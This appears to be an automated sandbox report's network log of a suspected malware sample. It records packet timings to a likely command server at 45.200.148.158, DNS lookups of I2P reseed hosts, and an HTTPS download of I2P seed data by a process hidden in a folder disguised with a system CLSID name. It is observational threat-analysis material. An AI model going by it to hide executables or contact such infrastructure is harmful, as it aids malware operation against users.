                Jan 1, 2025 18:10:02.812350035 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.812355042 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.812369108 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.812470913 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.813143969 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.814694881 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.814754009 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.814763069 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.814858913 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.814872980 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.814881086 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.814960003 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.814981937 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.815007925 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.815028906 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.815051079 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.821172953 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.838886023 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.838913918 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.838923931 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.839004993 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.839015007 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.839097023 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.839111090 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.839124918 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.839207888 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.839234114 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.839286089 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.839297056 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.839309931 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.839318037 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.839335918 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.839344025 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.839622021 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.839632034 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.839647055 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.839649916 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.839659929 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.839674950 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.839677095 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.839689970 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.839704990 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.839713097 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.839718103 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.839724064 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.840008974 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.840018988 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.840039015 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.840046883 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.840061903 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.841140985 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.841294050 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.841304064 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.841320992 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.841345072 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.841371059 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.841381073 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.841394901 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.841412067 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.841440916 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.841440916 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.841583967 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.845141888 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.847892046 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.847933054 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.847943068 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.847992897 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.848011017 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.848016024 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.848035097 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.848104000 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.848114967 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.848131895 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.848182917 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.848182917 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.848754883 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.848793983 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.848808050 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.848923922 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.848932981 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.848952055 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.848962069 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.848975897 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.849133968 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.849145889 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.849147081 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.849164009 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.849176884 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.849186897 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.849287987 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.849317074 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.849405050 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.849416018 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.849433899 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.849436045 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.849446058 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.849457026 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.849463940 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.849474907 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.849488020 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.849666119 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.849692106 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.849826097 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.849837065 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.849853992 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.849865913 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.849877119 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.849883080 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.849893093 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.849895954 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.849909067 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.849920988 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.849922895 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.849941015 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.849988937 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.849988937 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.850326061 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.850336075 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.850353956 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.850366116 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.850380898 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.850393057 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.850399017 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.850411892 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.850413084 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.850440025 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.850584984 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.850595951 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.850614071 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.850626945 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.850641966 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.850666046 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.850841999 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.850852966 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.850868940 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.850871086 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.850879908 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.850898027 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.850959063 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.850971937 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.850986004 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.850996017 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.851011038 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.851027012 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.851038933 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.851053953 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.851067066 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.851540089 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.851577044 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.864504099 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.864612103 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.864625931 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.864672899 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.864684105 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.864708900 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.864798069 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.864809990 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.864825010 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.865143061 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.898874998 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.898962021 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.898978949 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.899003029 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.899017096 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.899033070 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.899041891 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.899187088 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.899198055 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.899213076 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.901141882 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.901485920 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.901536942 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.901551008 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.901674032 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.901684046 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.901701927 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.901702881 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.901732922 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.901832104 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.905138969 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.925882101 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.925988913 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.926002979 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.926124096 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.926132917 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.926148891 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.926160097 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.926263094 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.926263094 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.926263094 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.926374912 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.926386118 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.926403999 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.926415920 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.926431894 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.926445961 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.926459074 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.926467896 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.926476955 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.926805973 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.926816940 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.926990032 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.927000999 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.927012920 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.927018881 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.927031994 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.927041054 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.927048922 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.927052975 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.928029060 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.928056002 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.928117990 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.928128958 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.928253889 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.928263903 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.928280115 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.928349972 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.928360939 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.928375959 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.929143906 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.934665918 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.934715986 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.934726000 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.934828997 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.934855938 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.934890985 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.934900999 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.934920073 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.934928894 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.934942961 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.935467005 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.935489893 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.935517073 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.935527086 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.935595989 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.935595989 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.935662985 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.935672998 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.935798883 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.935808897 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.935822964 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.935909986 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.935920000 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.935931921 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.936021090 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.936032057 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.936048031 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.936048031 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.936058998 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.936072111 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.936081886 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.936105013 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.936297894 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.936413050 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.936424017 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.936435938 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.936439037 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.936455011 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.936464071 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.936470985 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.936482906 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.936492920 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.936496973 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.936515093 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.936525106 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.936902046 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.936912060 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.936928034 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.936930895 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.936944962 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.936954021 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.936959982 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.936985016 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.937154055 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.937165976 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.937208891 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.937223911 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.937235117 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.937248945 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.937629938 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.937639952 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.937655926 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.937655926 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.937665939 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.937678099 CET497301129192.168.2.445.200.148.158
                Jan 1, 2025 18:10:02.937684059 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.937699080 CET11294973045.200.148.158192.168.2.4
                Jan 1, 2025 18:10:02.937709093 CET11294973045.200.148.158192.168.2.4
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Jan 1, 2025 18:10:16.753196955 CET192.168.2.41.1.1.10x15a6Standard query (0)reseed.i2pgit.orgA (IP address)IN (0x0001)false
                Jan 1, 2025 18:11:28.619482994 CET192.168.2.41.1.1.10xea12Standard query (0)reseed.diva.exchangeA (IP address)IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Jan 1, 2025 18:10:16.762455940 CET1.1.1.1192.168.2.40x15a6No error (0)reseed.i2pgit.org68.183.196.133A (IP address)IN (0x0001)false
                Jan 1, 2025 18:11:28.667567968 CET1.1.1.1192.168.2.40xea12No error (0)reseed.diva.exchange80.74.145.70A (IP address)IN (0x0001)false
                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.44973868.183.196.1334437100C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                TimestampBytes transferredDirectionData
                2025-01-01 17:10:17 UTC103OUTGET https://reseed.i2pgit.org:443/i2pseeds.su3 HTTP/1.0
                User-Agent: Wget/1.11.4
                Connection: close
                2025-01-01 17:10:17 UTC288INHTTP/1.1 200 OK
                Server: nginx/1.18.0
                Date: Wed, 01 Jan 2025 17:10:17 GMT
                Content-Type: application/octet-stream
                Content-Length: 63161
                Connection: close
                Content-Disposition: attachment; filename=i2pseeds.su3
                X-Ratelimit-Limit: 4
                X-Ratelimit-Remaining: 3
                X-Ratelimit-Reset: 900
                2025-01-01 17:10:17 UTC3830INData Raw: 49 32 50 73 75 33 00 00 00 06 02 00 00 10 00 17 00 00 00 00 00 00 f4 6a 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 31 37 33 35 37 33 39 30 34 33 00 00 00 00 00 00 68 61 6e 6b 68 69 6c 6c 31 39 35 38 30 40 67 6d 61 69 6c 2e 63 6f 6d 50 4b 03 04 14 00 08 00 08 00 b7 5b 21 5a 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 79 30 4a 35 4d 47 4f 78 4b 55 34 77 59 4b 6e 57 64 49 68 76 4c 48 32 52 69 5a 67 6c 49 78 63 6e 57 75 7a 61 52 30 6d 54 41 41 77 3d 2e 64 61 74 55 54 05 00 01 2a 27 75 67 ca b2 9e c9 1d e1 c4 f5 b8 e5 9a 52 77 b2 52 f2 fe e3 75 8a cc 81 87 e4 58 e4 be b0 d5 3c 91 b4 c9 f8 27 c0 b2 30 71 03 87 bc eb 3e cf f7 fc 2b d6 65 70 6f be 7f 71 59 be bc 49 59 84 69 f7 02 96 65 ff 6f 6c 53 2e fb ca e3 73 b7 5b ab
                Data Ascii: I2Psu3j1735739043hankhill19580@gmail.comPK[!Z;routerInfo-y0J5MGOxKU4wYKnWdIhvLH2RiZglIxcnWuzaR0mTAAw=.datUT*'ugRwRuX<'0q>+epoqYIYieolS.s[
                2025-01-01 17:10:17 UTC4096INData Raw: 03 04 14 00 08 00 08 00 79 6b 21 5a 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 58 37 52 35 5a 6c 75 61 54 49 4a 4e 31 5a 43 30 70 49 68 4d 48 43 58 43 32 43 4b 62 46 4b 4f 41 41 4b 59 71 4e 72 38 57 71 71 41 3d 2e 64 61 74 55 54 05 00 01 d7 42 75 67 da f6 21 82 35 b2 65 9e c9 99 c4 95 62 91 5f f4 f2 9c 66 b0 df fe ec 6b 53 10 22 56 ae ad d8 f7 c6 c0 5a 44 69 be 51 d0 92 c7 b9 5f 8e 4d 5a ad 53 cb d7 fb 5d 75 da 23 ed 95 4a 21 3a 69 61 b2 71 fa 0c a3 f2 f8 e5 0d 0f 9f d4 8b 38 b1 e0 d9 61 f6 ba 22 21 46 16 f1 c6 e3 3f 9f ce 2e bf 3f ad f0 d3 e9 45 86 e6 2b cd 58 19 58 18 d8 19 58 18 18 18 a7 28 f1 4a 08 b0 30 33 40 01 ab 5f 88 73 80 11 43 39 4b 46 7e 71 89 2d 9f 85 85 9e a1 a5 b1 9e a1 89 99 9e a1 99 a9 35 63 a6 ad 44
                Data Ascii: yk!Z;routerInfo-X7R5ZluaTIJN1ZC0pIhMHCXC2CKbFKOAAKYqNr8WqqA=.datUTBug!5eb_fkS"VZDiQ_MZS]u#J!:iaq8a"!F?.?E+XXX(J03@_sC9KF~q-5cD
                2025-01-01 17:10:17 UTC4096INData Raw: f2 92 b8 3d f5 1d 07 7b fd c9 8b 97 19 27 49 1c 3d 24 bd 28 78 bd 1c c3 ff e5 4b 97 b4 7d 4b 49 a8 66 55 62 39 a2 3f e1 e1 bd cb 8c fd 42 2a 7d d9 cb 7e 3c b9 9e 1b 73 ce e2 d4 df a9 7b 6e 9e ee 4d fe f9 72 54 1e bf fc 49 f1 a9 9f 9d dd 4d 57 6d 99 18 cc 38 31 d1 e1 46 c4 af d3 0a 9f 58 3a d4 4c 4a ed 8c 45 b3 a3 98 58 19 58 18 d8 19 58 18 18 18 a7 28 c6 55 04 33 31 33 40 01 ab 5f 88 73 80 11 43 09 4b 46 7e 71 89 2d b7 a9 9e a1 85 a1 9e 91 9e a1 a1 81 35 63 a6 ad 84 51 99 b9 91 5b b6 45 6e 45 5a b1 81 59 aa 87 49 96 bf 7f 59 98 a3 ad ad 35 4b 41 7e 51 89 2d ab 91 91 a1 a9 a5 35 63 b1 ad 4e a5 73 a2 bf 45 61 78 66 9d a1 7b 6a 56 5a 6e a2 77 a0 8f a1 41 4e a8 97 b9 ae 91 67 50 64 96 87 99 53 86 67 78 78 72 99 a9 51 b1 ad 35 63 99 2d a3 91 35 07 cc 11 2c c1
                Data Ascii: ={'I=$(xK}KIfUb9?B*}~<s{nMrTIMWm81FX:LJEXXX(U313@_sCKF~q-5cQ[EnEZYIY5KA~Q-5cNsEaxf{jVZnwANgPdSgxxrQ5c-5,
